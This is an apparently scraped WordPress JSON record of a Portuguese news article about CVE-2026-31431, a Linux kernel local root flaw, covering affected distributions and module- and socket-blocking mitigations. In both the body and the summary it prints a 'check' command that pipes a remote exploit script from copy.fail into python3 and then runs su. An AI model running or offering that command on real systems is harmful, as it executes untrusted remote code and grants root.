{"id":600767,"date":"2026-05-01T12:01:20","date_gmt":"2026-05-01T15:01:20","guid":{"rendered":"https:\/\/www.portaltela.com\/noticias\/2026\/05\/01\/falha-no-linux-permite-acesso-root-imediato-em-sistemas-desde-2017\/"},"modified":"2026-05-01T12:01:20","modified_gmt":"2026-05-01T15:01:20","slug":"falha-no-linux-permite-acesso-root-imediato-em-sistemas-desde-2017","status":"publish","type":"post","link":"https:\/\/www.portaltela.com\/noticias\/ciencia\/2026\/05\/01\/falha-no-linux-permite-acesso-root-imediato-em-sistemas-desde-2017\/","title":{"rendered":"Falha no Linux permite acesso root imediato em sistemas desde 2017"},"content":{"rendered":"<p>Pesquisadores da Xint Code identificaram uma vulnerabilidade grave no Linux que permite acesso root imediato a usu\u00e1rios locais sem privil\u00e9gios. A falha, registrada como CVE-2026-31431, pode impactar servidores multiusu\u00e1rio, ambientes de cont\u00eaineres e pipelines de CI\/CD desde 2017. O problema afeta virtualmente todas as distribui\u00e7\u00f5es Linux em uso.<\/p>\n<p>A descoberta ocorreu com a ajuda de um assistente de Intelig\u00eancia Artificial. Os pesquisadores destacam que, apesar da corre\u00e7\u00e3o j\u00e1 ter sido aplicada no kernel, a divulga\u00e7\u00e3o r\u00e1pida reduz o tempo de resposta de distribui\u00e7\u00f5es e administradores. A vulnerabilidade est\u00e1 presente mesmo em ambientes de produ\u00e7\u00e3o.<\/p>\n<p>Entre as distribui\u00e7\u00f5es citadas como afetadas est\u00e3o Ubuntu 24, RHEL 10, SUSE 16 e Amazon Linux 2023. O Windows Subsystem for Linux 2 (WSL2) tamb\u00e9m \u00e9 impactado. Em alguns casos, a explora\u00e7\u00e3o pode ocorrer com apenas 732 bytes de c\u00f3digo.<\/p>\n<p>Para verificar a exposi\u00e7\u00e3o, especialistas indicam executar curl https:\/\/copy.fail\/exp | python3 &amp;&amp; su a partir de uma conta sem privil\u00e9gios. Embora simples, o m\u00e9todo depende de um script externo confi\u00e1vel. O c\u00f3digo-fonte da prova de conceito est\u00e1 dispon\u00edvel para consulta p\u00fablica.<\/p>\n<p>Como mitiga\u00e7\u00e3o, basta desativar o m\u00f3dulo algif_aaed se ele for carregado como m\u00f3dulo. Um comando simples pode resolver: echo install algif_aead \/bin\/false &gt; \/etc\/modprobe.d\/disable-algif.conf. Em distribui\u00e7\u00f5es que integram a fun\u00e7\u00e3o no n\u00facleo, como RHEL e WSL2, a mitiga\u00e7\u00e3o envolve impedir que usu\u00e1rios abram sockets AF_ALG via perfis de seguran\u00e7a, como seccomp, AppArmor ou SELinux.<\/p>\n<p>Especialistas destacam que, mesmo com corre\u00e7\u00f5es, o risco permanece at\u00e9 que todas as distribui\u00e7\u00f5es atualizem seus kernels. A divulga\u00e7\u00e3o precoce permite que administradores apliquem as medidas de prote\u00e7\u00e3o com anteced\u00eancia, reduzindo vulnerabilidade em ambientes cr\u00edticos. A partir de agora, empresas devem priorizar atualiza\u00e7\u00f5es e valida\u00e7\u00e3o de pol\u00edticas de seguran\u00e7a.<\/p>\n","protected":false},"excerpt":{"rendered":"<ul>\n<li>Falha no Linux permite acesso root imediato a usu\u00e1rios locais sem privil\u00e9gios (CVE-2026-31431), afetando quase todas as distribui\u00e7\u00f5es e existindo desde 2017, incluindo Ubuntu 24, RHEL 10, SUSE 16, Amazon Linux 2023 e o WSL2 do Windows. A explora\u00e7\u00e3o pode exigir apenas cerca de 732 bytes.<\/li>\n<li>Pesquisadores da Xint Code descobriram a vulnerabilidade com o aux\u00edlio de assistente de Intelig\u00eancia Artificial; a falha j\u00e1 tinha corre\u00e7\u00e3o, mas a divulga\u00e7\u00e3o r\u00e1pida reduziu o tempo para resposta.<\/li>\n<li>Para verificar a vulnerabilidade, pode-se executar curl https:\/\/copy.fail\/exp | python3 &amp;&amp; su com uma conta sem privil\u00e9gios, embora isso dependa de c\u00f3digo de terceiros.<\/li>\n<li>Mitiga\u00e7\u00f5es: se o kernel carrega o m\u00f3dulo algif_aaed, \u00e9 poss\u00edvel desativ\u00e1-lo com echo \u201cinstall algif_aead \/bin\/false\u201d em um arquivo de configura\u00e7\u00e3o; em distribui\u00e7\u00f5es que compilam a funcionalidade no n\u00facleo (como RHEL e WSL2), \u00e9 recomendado impedir que usu\u00e1rios abram sockets AF_ALG por meio de perfis Seccomp, AppArmor ou SELinux.<\/li>\n<li>O ataque \u00e9 executado na mem\u00f3ria, sem grava\u00e7\u00f5es em disco, e o c\u00f3digo-fonte da prova de conceito est\u00e1 dispon\u00edvel para quem quiser testar; a divulga\u00e7\u00e3o p\u00fablica gerou debates sobre o timing e a necessidade de corre\u00e7\u00e3o r\u00e1pida.<\/li>\n<\/ul>\n","protected":false},"author":15,"featured_media":600786,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"summary":"Vulnerabilidade no kernel Linux permite acesso root imediato a usu\u00e1rios locais, afetando distros desde 2017 e ambientes multiusu\u00e1rio, com corre\u00e7\u00f5es em andamento","footnotes":""},"categories":[296,1],"tags":[84,85,100,189],"class_list":["post-600767","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ciencia","category-noticias","tag-acontecimentos-internacionais","tag-inovacao","tag-noticia","tag-tecnologia"],"_links":{"self":[{"href":"https:\/\/www.portaltela.com\/api\/wp\/v2\/posts\/600767","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.portaltela.com\/api\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.portaltela.com\/api\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.portaltela.com\/api\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/www.portaltela.com\/api\/wp\/v2\/comments?post=600767"}],"version-history":[{"count":0,"href":"https:\/\/www.portaltela.com\/api\/wp\/v2\/posts\/600767\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.portaltela.com\/api\/wp\/v2\/media\/600786"}],"wp:attachment":[{"href":"https:\/\/www.portaltela.com\/api\/wp\/v2\/media?parent=600767"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.portaltela.com\/api\/wp\/v2\/categories?post=600767"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.portaltela.com\/api\/wp\/v2\/tags?post=600767"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}